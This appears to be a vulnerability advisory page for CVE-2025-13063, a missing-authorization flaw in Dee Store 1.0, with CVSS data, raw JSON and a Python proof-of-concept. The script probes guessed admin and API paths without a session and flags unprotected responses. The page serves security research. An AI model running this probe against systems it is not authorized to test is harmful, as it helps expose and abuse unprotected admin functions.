Security Vulnerability Report
CVE-2025-13063 CVSS 7.3 HIGH

CVE-2025-13063

Published: 2025-11-12 21:15:49
Last Modified: 2026-04-29 01:00:02

Description

A missing-authorization flaw (CWE-862 / CWE-863) has been found in DinukaNavaratna Dee Store 1.0. The advisory does not identify the affected function; it states only that multiple endpoints are affected and that they can be reached remotely without prior authentication (PR:N). A public exploit exists, so exposed installations should be treated as actively exploitable.

CVSS Details

CVSS Score
7.3
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L (the same source also publishes a CVSS 4.0 vector with base score 5.5 MEDIUM and exploit maturity "proof of concept"; the 7.3 HIGH shown above is the v3.1 score — see the raw JSON below)

Configurations (Affected Products)

No CPE configuration data is available for this CVE; the affected product is listed by name only:

DinukaNavaratna Dee Store 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. Run it only against systems you own or have written authorization to test; the endpoint paths it probes are not taken from the advisory and a "200 OK" is a lead to confirm by hand, not proof of exploitation.
python
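# CVE-2025-13063 PoC - Dee Store 1.0 Missing Authorization (CWE-862 / CWE-863)
# Target: DinukaNavaratna Dee Store 1.0
# Vulnerability: Broken Access Control / Missing Authorization
#
# Requests a list of candidate endpoints with no session at all and reports
# which ones answer with page content instead of a login redirect or 401/403.
#
# NOTE: the advisory only says "multiple endpoints are affected". The default
# path list below is NOT taken from the advisory; confirm it against the vendor
# issue the advisory references before treating any hit as a finding.
import argparse

# Redirects are deliberately NOT followed (see _http_get). With requests'
# default allow_redirects=True, a protected page that bounces to login.php
# comes back as a 200 login form and was reported as "VULNERABLE".
REDIRECT_STATUSES = frozenset({301, 302, 303, 307, 308})
PROTECTED_STATUSES = frozenset({401, 403}) | REDIRECT_STATUSES

# Candidate endpoints. Not from the advisory -- override with -e/--endpoint.
DEFAULT_ENDPOINTS = (
    "/admin/dashboard.php",
    "/admin/users.php",
    "/admin/products.php",
    "/admin/orders.php",
    "/api/user/profile",
    "/api/admin/settings",
)

# Substrings (lower-case) that indicate a login form was served rather than a
# real page; a 200 that matches one of these is not an authorization bypass.
LOGIN_MARKERS = ('type="password"', "type='password'", 'name="password"')

# Weak hint only: the old PoC treated "admin"/"dashboard" anywhere in the body
# as proof of exposure, which a login page titled "Admin" also satisfies.
ADMIN_HINTS = ("admin", "dashboard")


class FetchError(Exception):
    """Raised by the default fetcher when the HTTP request itself fails."""


def _http_get(url, *, timeout=10.0, verify=True):
    """Fetch *url* unauthenticated and return ``(status_code, body_text)``.

    Redirects are not followed so a login bounce is visible as a 3xx.
    TLS verification is on by default; pass ``verify=False`` only for lab
    targets with self-signed certificates.

    ``requests`` is imported here rather than at module level so the
    classifier and ``exploit()`` can be exercised offline with a stub fetcher.

    Raises:
        FetchError: on any transport-level failure (connect, timeout, TLS).
    """
    import requests

    headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"}
    try:
        resp = requests.get(
            url,
            headers=headers,
            timeout=timeout,
            verify=verify,
            allow_redirects=False,
        )
    except requests.exceptions.RequestException as exc:
        raise FetchError(str(exc)) from exc
    return resp.status_code, resp.text


def classify(status, body):
    """Map one unauthenticated response to a verdict string.

    Returns one of:
      ``"protected"``  -- 401, 403 or a redirect (typically to a login page);
      ``"login-form"`` -- 200 whose body contains a password field;
      ``"exposed"``    -- 200 with no login form: a lead to verify manually;
      ``"unexpected"`` -- any other status (404, 5xx, ...).
    """
    if status in PROTECTED_STATUSES:
        return "protected"
    if status != 200:
        return "unexpected"
    lowered = (body or "").lower()
    if any(marker in lowered for marker in LOGIN_MARKERS):
        return "login-form"
    return "exposed"


def exploit(target_url, *, endpoints=None, fetch=None, timeout=10.0, verify=True):
    """Probe *target_url* for CVE-2025-13063 and return ``[(url, verdict), ...]``.

    Args:
        target_url: base URL of the Dee Store install, e.g.
            ``http://host/dee-store`` (a trailing slash is tolerated).
        endpoints: iterable of paths to probe; defaults to ``DEFAULT_ENDPOINTS``.
        fetch: callable ``(url) -> (status, body)`` raising ``FetchError`` on
            transport failure; defaults to an unauthenticated ``requests.get``.
            Injectable so the classification can be tested without a target.
        timeout: per-request timeout in seconds for the default fetcher.
        verify: TLS certificate verification for the default fetcher. Leave
            ``True`` outside a lab; the old PoC hard-coded ``verify=False``.

    Returns:
        One ``(url, verdict)`` pair per probed path, in order. Verdicts are
        those of ``classify()`` plus ``"error"`` when the request failed.
        ``"exposed"`` means content came back with no session and no login
        form -- it is a lead, not proof; confirm by hand.
    """
    if fetch is None:
        fetcher = lambda url: _http_get(url, timeout=timeout, verify=verify)
    else:
        fetcher = fetch
    base = target_url.rstrip("/")
    paths = DEFAULT_ENDPOINTS if endpoints is None else tuple(endpoints)

    print(f"[*] Target: {target_url}")
    print("[*] Probing for CVE-2025-13063: Missing Authorization")

    results = []
    for path in paths:
        url = base + path
        try:
            status, body = fetcher(url)
        except FetchError as exc:
            print(f"[!] Error accessing {url}: {exc}")
            results.append((url, "error"))
            continue

        verdict = classify(status, body)
        if verdict == "exposed":
            print(f"[+] POSSIBLY EXPOSED (verify manually): {url}")
            print(f"    Status: {status}")
            print(f"    Length: {len(body or '')} chars")
            lowered = (body or "").lower()
            if any(hint in lowered for hint in ADMIN_HINTS):
                print("    [!] Body mentions admin/dashboard (weak hint only)")
        elif verdict == "login-form":
            print(f"[-] Login form served: {url} - Status: {status}")
        elif verdict == "protected":
            print(f"[-] Protected: {url} - Status: {status}")
        else:
            print(f"[?] Unexpected: {url} - Status: {status}")
        results.append((url, verdict))
    return results


def main():
    """CLI entry point: ``python poc.py <target_url> [--insecure] [--timeout S] [-e PATH ...]``."""
    parser = argparse.ArgumentParser(
        description="CVE-2025-13063 PoC - Dee Store 1.0 missing authorization"
    )
    parser.add_argument("target_url", help="e.g. http://target.com/dee-store")
    parser.add_argument(
        "--insecure",
        action="store_true",
        help="skip TLS certificate verification (lab targets only)",
    )
    parser.add_argument(
        "--timeout", type=float, default=10.0,
        help="per-request timeout in seconds (default: 10)",
    )
    parser.add_argument(
        "-e", "--endpoint", action="append", dest="endpoints", metavar="PATH",
        help="path to probe (repeatable); replaces the built-in candidate list",
    )
    args = parser.parse_args()
    exploit(
        args.target_url,
        endpoints=args.endpoints,
        timeout=args.timeout,
        verify=not args.insecure,
    )


if __name__ == "__main__":
    main()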

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13063", "sourceIdentifier": "[email protected]", "published": "2025-11-12T21:15:48.950", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A flaw has been found in DinukaNavaratna Dee Store 1.0. Affected is an unknown function. Executing manipulation can lead to missing authorization. The attack may be performed from remote. The exploit has been published and may be used. Multiple endpoints are affected."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", 
"vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}, {"lang": "en", "value": "CWE-863"}]}], "references": [{"url": "https://github.com/DinukaNavaratna/Dee_Store-Simple_Online_Shopping_Website/issues/1", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.332189", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.332189", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.682708", "source": "[email protected]"}]}}